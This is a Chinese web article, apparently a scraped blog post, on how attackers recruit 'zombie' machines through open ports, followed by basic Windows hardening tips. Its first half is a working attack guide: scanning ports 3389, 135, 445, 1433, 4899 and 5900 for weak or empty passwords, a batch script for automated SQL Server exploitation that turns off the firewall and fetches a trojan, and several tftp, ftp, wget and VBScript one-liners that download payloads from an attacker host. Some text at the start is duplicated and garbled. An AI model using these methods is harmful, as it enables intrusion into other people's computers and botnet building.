如何防范黑客行为需要做的五件事:黑客是如何利用端口漏洞来抓
如何防范黑客行为需要做的五件事:黑客是如何利用端口漏洞来抓和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。3、扫445端口抓肉鸡这种方法只针XP系统,如果遇到2000、 2003、win7系统就不要试了2、扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。
黑客是如何利用端口漏洞来抓"肉鸡"的?我们该如何防范?"肉鸡"这个名词我在之前的文章有简单介绍过,这里为了多数读者小白同志能理解,再详细阐述一次,"肉鸡"也称傀儡机,是指可以被黑客远程操控的机器,可以理解为是一组已被恶意软件感染并受恶意行为者控制的计算机。可以设计用于完成非法或恶意任务,包括发送垃圾邮件,窃取数据,勒索软件,欺诈性地点击广告或分布式拒绝服务(DDoS)攻击 。
一、黑客是如何利用端口漏洞来抓"肉鸡"的?
1、3389抓鸡
现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new 密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~
这种方法只针XP系统,如果遇到2000、 2003、win7系统就不要试了
2、扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。
3、扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。
4、1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S扫sqlhello.exenc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描 溢出.bat文件
@echooff
for/f"eol=;tokens=1 2delims="%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX 中间是空格1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(以2进制传输数据)
echogetxxx.exe(你的木马的文件名 要放在根目录下)>>daima.txt
echobye>>daima.txt
netstopsharedaccess(关闭WINDOWS自带防火墙)
ftp-s:daima.txt
xxx.exe(也是填你木马的文件名)
deldaima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
几种肉鸡上传文件的方法
tftp法
先在自己某机器上建个tftp服务器 如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行:tftp-i服务器ipgetsample.exe
ftp法
肉鸡cmd中执行:
echoOpenftp服务器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget网站/sample.exe
利用dl.vbe法
肉鸡cmd中执行:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get" .arguments(0) 0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1) 2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET" iRemote 0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal 2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
利用Http网站vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET" "http://*.*.*.*/sample.exe" 0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe" 2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)先打开多个NC.bat 然后再打开扫描 溢出.bat 然后你就可以去睡觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也可以这样溢出,只要用这些端口的溢出工具就好了,注意,上面的工具和批处理什么的都要放在同一个文件
夹下。
5、用WINNTAutoAttack扫SA弱口令抓肉鸡
其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下。
工具:WINNTAutoAttackSQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下
的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA
账号,接着开始扫描,扫完后,用SQL综合利用工具连上传马
执行就好了。
6、扫4899空口令抓肉鸡
工具:端口扫描器4899探测器Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。
8、扫5900端口抓VNC肉鸡
工具:VNC扫描器VNC连接器
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)-p5900-vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched banned vulnerable 只有单词为vulnerable才能连接。
三、如何保护自己的电脑不被当成"肉鸡"呢?
常规方法:
1、创建安全密码
很多人的设备一直是默认用户名和密码或者是很简单的密码,这很容易被不法之徒破解。所以创建一个复杂安全的密码是非常有必要的,现在一个非常安全的密码使得暴力破解是很不容易破解的。
2、定期系统清理和恢复
定期给系统做好备份,一旦电脑出现什么问题,可以直接恢复到上次安全状态,可以将那些垃圾软件包括僵尸网络软件给清理干净。
3、安装必要的安全防护杀毒软件
现在的杀毒软件也越来越厉害了,而且还是免费的。只要电脑在使用过程中没有访问乱七八糟的那些网站和软件,杀毒软件就可以保证的电脑的安全。
现在"肉鸡"不仅仅是电脑了,只要能联网的设备都有可能成为"肉鸡"。如果你的电脑已经成为了"肉鸡",首先可以通过杀毒软件进行病毒查杀,或者重装系统。如果是物联网设备成为了"肉鸡",可以恢复出厂设置或以其他方式格式化设备。 如果这些选项不可行,则可以从设备制造商或系统管理员处获得其他解决方法
专业方法:
1、屏幕保护
在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。提示:部分设计不完善的屏幕保护程序没有屏蔽系统的"Ctrl Alt Del"的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug.不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的"在当前位置创建快捷方式"命令,在桌面上为这些屏幕保护程序建立一个快捷方式。此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。
2、巧妙隐藏硬盘
在"按Web页"查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果"修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件",这时单击"显示文件"就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击"查看"标签,选择"显示所有文件",这样就可以看见这两个文件了)。再按"F5"键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。接下来我们用"记事本"打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系,先找到"显示文件"将其删除,找到"修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件",将其改为自己喜欢的文字,例如"安全重地,闲杂人等请速离开"。将"要查看该文件夹的内容,请单击"改为"否则,后果自负!",接着向下拖动滑块到倒数第9行,找到"(file://%TEMPLATEDIR%\wvlogo.gif)"这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用"d:\tupian\tupian1.jpg"替换"//"后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中"~"之间的内容就可以了*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0*usingthefile%THISDIRPATH%\folder.htt.保存并退出,按"F5"键刷新一下,是不是很有个性?接下来要作的就是用"超级兔子"将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中"~"之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。
3、禁用"开始"菜单命令
在Windows系统中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行"开始→运行"命令,在"运行"对话框的"打开"栏中输入"gpedit.msc",然后单击"确定"按钮即可启动WindowsXP组策略编辑器。在"本地计算机策略"中,逐级展开"用户配置→管理模板→任务栏和开始菜单"分支,在右侧窗口中提供了"任务栏"和"开始菜单"的有关策略。在禁用"开始"菜单命令的时候,在右侧窗口中,提供了删除"开始"菜单中的公用程序组、"我的文档"图标、"文档"菜单、"网上邻居"图标等策略。清理"开始"菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除"我的文档"图标为例,具体操作步骤为:
1)在策略列表窗口中用鼠标双击"从开始菜单中删除我的文档图标"选项。
2)在弹出窗口的"设置"标签中,选择"已启用"单选按钮,然后单击"确定"即可。
4、桌面相关选项的禁用
Windows系统的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在"本地计算机策略"中展开"用户配置→管理模板→桌面"分支,即可在右侧窗口中显示相应的策略选项。1)隐藏桌面的系统图标倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。若要隐藏桌面上的"网上邻居"和"InternetEXPlorer"图标,只要在右侧窗口中将"隐藏桌面上网上邻居图标"和"隐藏桌面上的InternetEXPlorer图标"两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将"隐藏和禁用桌面上的所有项目"启用即可。当启用了"删除桌面上的我的文档图标"和"删除桌面上的我的电脑图标"两个选项以后,"我的电脑"和"我的文档"图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢"回收站"这个图标,那么也可以把它给删除,具体方法是将"从桌面删除回收站"策略项启用。2)禁止对桌面的某些更改如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将"退出时不保存设置"这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。
5、禁止访问"控制面板"
如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开"本地计算机策略→用户配置→管理模板→控制面板"分支,然后将右侧窗口的"禁止访问控制面板"策略启用即可。此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从"开始"菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。提示:如果你想从上下文菜单的属性项目中选择一个"控制面板"项目,会出现一个消息,说明该设置防止这个操作。
6、设置用户权限
当多人共用一台计算机时,在Windows系统中设置用户权限,可以按照以下步骤进行:
1)运行组策略编辑器程序。
2)在编辑器窗口的左侧窗口中逐级展开"计算机配置→Windows设置→安全设置→本地策略→用户权限指派"分支。
3)双击需要改变的用户权限,单击"添加用户或组"按钮,然后双击想指派给权限的用户账号,最后单击"确定"按钮退出。
7、文件夹设置审核Windows系统可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。
为文件和文件夹设置审核的步骤如下:
1)在组策略窗口中,逐级展开右侧窗口中的"计算机配置→Windows设置→安全设置→本地策略"分支,然后在该分支下选择"审核策略"选项。
2)在右侧窗口中用鼠标双击"审核对象访问"选项。
3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的"属性"命令,接着在弹出的窗口中选择"安全"标签。
4)单击"高级"按钮,然后选择"审核"标签。
5)根据具体情况选择你的操作:倘若对一个新组或用户设置审核,可以单击"添加"按钮,并且在"名称"框中键入新用户名,然后单击"确定"按钮打开"审核项目"对话框。要查看或更改原有的组或用户审核,可以选择用户名,然后单击"查看/编辑"按钮。要删除原有的组或用户审核,可以选择用户名,然后单击"删除"按钮即可。
6)如有必要的话,在"审核项目"对话框中的"应用到"列表中选取你希望审核的地方。
7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择"仅对此容器内的对象和/或容器应用这些审核项"复选框。注意:必须是管理员组成员或在组策略中被授权有"管理审核和安全日志"权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前,你必须启用组策略中"审核策略"的"审核对象访问"。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。
